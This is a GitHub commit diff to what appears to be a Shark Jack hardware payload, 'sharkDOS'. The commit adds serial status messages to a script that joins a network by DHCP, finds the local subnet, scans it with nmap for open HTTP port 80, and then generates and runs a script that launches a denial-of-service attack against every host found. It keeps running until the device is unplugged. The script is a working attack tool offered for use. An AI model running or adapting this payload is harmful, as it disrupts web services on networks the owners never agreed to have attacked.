adding SERIAL_WRITE

pull/59/head
drapl0n 2022-06-17 19:09:01 +05:30 committed by GitHub
parent 0044512a6c
commit 2387b783c1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 3 deletions

View File

@ -21,16 +21,21 @@
#
#
LED SETUP
SERIAL_WRITE [*] Waiting for IP from DHCP...
NETMODE DHCP_CLIENT
SERIAL_WRITE [*] Waiting for IP from DHCP
SERIAL_WRITE [*] IP assigned from DHCP!
SERIAL_WRITE [*] Fetching IP for scanning network...
while [ -z "$SUBNET" ]; do
sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done
SERIAL_WRITE [*] IP Fetched!
# Scan network
LED ATTACK
SERIAL_WRITE [*] Scanning for open http ports
SERIAL_WRITE [*] Scanning for open http ports...
open=$(nmap -p 80 $SUBNET -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }'
SERIAL_WRITE [*] Scanning completed!
chmod +x /root/payload/sharkDOS/sharkDOS
SERIAL_WRITE [*] Started DOS execution...
echo "#\!/bin/bash" > /root/payload/sharkDOS/main
for i in $open
do
@ -39,5 +44,5 @@ done
chmod +x /root/payload/sharkDOS/main
/root/payload/sharkDOS/./main
LED FINISH
SERIAL_WRITE [*] Payload complete!
SERIAL_WRITE [*] Payload complete! Unplug Shark Jack to stop DOS.
sleep 2 && sync